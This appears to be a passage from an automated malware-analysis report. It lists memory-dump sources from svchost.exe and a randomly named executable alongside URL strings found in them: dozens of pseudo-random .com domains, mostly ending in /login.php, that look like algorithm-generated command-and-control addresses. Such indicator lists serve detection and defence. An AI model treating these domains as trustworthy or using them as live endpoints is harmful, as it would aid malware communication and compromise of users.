Source: svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000125D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjad.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684006366.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1678100644.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjar.com/
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668142095.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykynon.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyser.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykytin.com/login.php
Source: svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078523532.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735650699.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvor.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyvyx.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyjyd.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylen.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1854465628.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873631057.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1866515566.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1851274334.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylij.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736287132.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1734147322.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymylyr.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymymax.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693275657.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735230744.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731387306.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735695137.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698682542.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysan.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668590498.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674611166.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675004112.000000000CCF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysox.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysud.com/
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymysud.com/http://galykiz.com/http://gahyhys.com/http://gahyhys.com/http://vopybok.com/
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1675053991.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymytuj.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839984211.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840588925.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616687840.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618514695.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840908556.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1620758729.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617424678.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621135281.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyvin.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/H
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076185402.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2075366204.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076874917.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581649743.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793070832.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lymyxid.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F20000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lymyxid.com/login.php
Source: svchost.exe, 00000002.00000003.1690442076.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691406398.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900699978.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638530291.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803806662.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898687726.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2690115782.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1690742245.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyd.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjej.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/http://qetylyv.com/http://lyryled.com/http://qekynuq.com/
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/login.php
